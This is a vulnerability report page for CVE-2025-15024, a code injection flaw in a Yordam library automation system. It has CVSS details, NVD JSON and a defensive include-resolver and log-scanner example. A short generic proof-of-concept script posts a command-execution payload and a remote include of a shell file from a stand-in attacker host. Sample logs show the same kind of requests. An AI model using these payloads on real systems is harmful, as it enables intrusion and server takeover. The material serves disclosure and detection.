Security Vulnerability Report
CVE-2025-15024 CVSS 8.8 HIGH

CVE-2025-15024

Published: 2026-05-14 18:16:35
Last Modified: 2026-05-14 18:19:37

Description

Improper Control of Generation of Code ('Code Injection') vulnerability in Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc. Library Automation System allows Remote Code Inclusion. This issue affects Library Automation System: from v.19.5 before v.22.1.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Reading: reachable over the network with no prior privileges, but exploitation needs a user action (UI:R); a successful attack fully compromises the affected component (confidentiality, integrity and availability all High, scope unchanged).

Configurations (Affected Products)

No CPE configuration data is available for this entry. Affected versions (from the description): v.19.5 up to, but not including, v.22.1.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Exploit Title: Yordam Library Automation System - Remote Code Injection (CVE-2025-15024)
# Description: Proof of concept for code injection vulnerability.
# Disclaimer: For educational purposes only.

# Placeholder: the advisory does not publish the affected endpoint or parameter.
target_url = "http://target-host/vulnerable_endpoint"

# The attacker crafts a payload to inject system commands.
# The exact parameter name depends on the vulnerable component.
payload_data = {
    "vulnerable_parameter": "system('id'); // or include('http://attacker-server/shell.txt')"
}

try:
    # Sending the malicious request (timeout added so a hung target cannot block the script)
    response = requests.post(target_url, data=payload_data, timeout=10)
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Server Response:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except requests.RequestException as e:
    print(f"[-] Error occurred: {e}")
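The advisory publishes no endpoint or parameter, so the block below is an added example (it is not Yordam's code and is not taken from the advisory) showing the defender's side of a CWE-94 remote/local inclusion bug: an include resolver that rejects URL schemes and anything outside a fixed allowlist, and a scanner that flags inclusion and code-eval payloads in web access logs. The template directory `/srv/yordam/templates`, the allowlist, the endpoint `/index.php`, the parameter `page`, and the log lines are all constructed assumptions.

```python
"""Added example, not Yordam's code: hardened include resolution plus log-based
detection for a CWE-94 remote/local inclusion bug. All names are assumptions."""
import re
from pathlib import Path
from urllib.parse import unquote_plus, urlsplit

# Assumed allowlist of templates the application is ever permitted to include.
ALLOWED_TEMPLATES = {"catalog.tpl", "loan_report.tpl", "member_card.tpl"}


def resolve_include(user_value: str, base_dir: str) -> str:
    """Map a user-supplied template name onto a file inside base_dir, or raise."""
    name = unquote_plus(user_value)          # normalise %-encoding before any check
    parts = urlsplit(name)
    # Remote inclusion: reject any scheme (http, ftp, php, data, ...) or a '//host' form.
    if parts.scheme or parts.netloc or name.startswith("//"):
        raise ValueError("remote include rejected")
    # Only names from the fixed allowlist may be included; no free-form paths.
    if name not in ALLOWED_TEMPLATES:
        raise ValueError("template not in allowlist")
    base = Path(base_dir).resolve()
    target = (base / name).resolve()
    # Even an allowlisted name must still resolve underneath base_dir.
    if base not in target.parents:
        raise ValueError("path escapes template directory")
    return str(target)


def include_decisions(values, base_dir):
    """Return {user_value: resolved path or 'rejected: <reason>'} for reporting."""
    out = {}
    for v in values:
        try:
            out[v] = resolve_include(v, base_dir)
        except ValueError as e:
            out[v] = f"rejected: {e}"
    return out


# Common Log Format: client, identd, user, [time], "METHOD target PROTO", status ...
LOG_LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3})')

# Indicators checked against both the raw and the %-decoded request target.
INDICATORS = {
    "remote-include": re.compile(r"=(?:https?|ftp|php|data)(?:%3a|:)(?:%2f|/){2}", re.I),
    "traversal": re.compile(r"(?:%2e%2e|\.\.)(?:%2f|%5c|/|\\)", re.I),
    "code-eval": re.compile(r"\b(?:system|passthru|shell_exec|exec|eval|assert)\s*(?:%28|\()", re.I),
}


def scan_access_log(lines):
    """Return (client, method, target, indicator) for each request matching an indicator."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, method, target, _status = m.groups()
        candidates = (target, unquote_plus(target))
        for label, pat in INDICATORS.items():
            if any(pat.search(c) for c in candidates):
                hits.append((client, method, target, label))
                break
    return hits


SAMPLE_LOG = [  # constructed sample lines, not from a real incident
    '203.0.113.9 - - [14/May/2026:18:20:01 +0000] "GET /index.php?page=catalog.tpl HTTP/1.1" 200 512',
    '203.0.113.9 - - [14/May/2026:18:20:07 +0000] "GET /index.php?page=http://198.51.100.7/shell.txt HTTP/1.1" 200 77',
    '198.51.100.23 - - [14/May/2026:18:21:30 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 500 0',
    '198.51.100.23 - - [14/May/2026:18:22:02 +0000] "POST /index.php?page=catalog.tpl&x=system%28%27id%27%29%3B HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    probes = ["catalog.tpl", "http://198.51.100.7/shell.txt", "../../etc/passwd", "//evil/x"]
    for value, decision in include_decisions(probes, "/srv/yordam/templates").items():
        print(f"{value!r:40} -> {decision}")
    for hit in scan_access_log(SAMPLE_LOG):
        print("ALERT", hit)
```

The resolver deliberately checks the decoded value: a single layer of percent-encoding (`%68ttp%3a//...`) is enough to slip a URL past a naive `startswith("http")` test. The scanner matches both raw and decoded targets for the same reason, and stops at the first indicator per line so one noisy request does not produce several alerts.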

References

https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0240 (advisory TR-26-0240 at siberguvenlik.gov.tr; the only reference listed in the NVD record below)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15024", "sourceIdentifier": "[email protected]", "published": "2026-05-14T18:16:35.063", "lastModified": "2026-05-14T18:19:37.060", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Generation of Code ('Code Injection') vulnerability in Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc. Library Automation System allows Remote Code Inclusion.\n\nThis issue affects Library Automation System: from v.19.5 before v.22.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0240", "source": "[email protected]"}]}}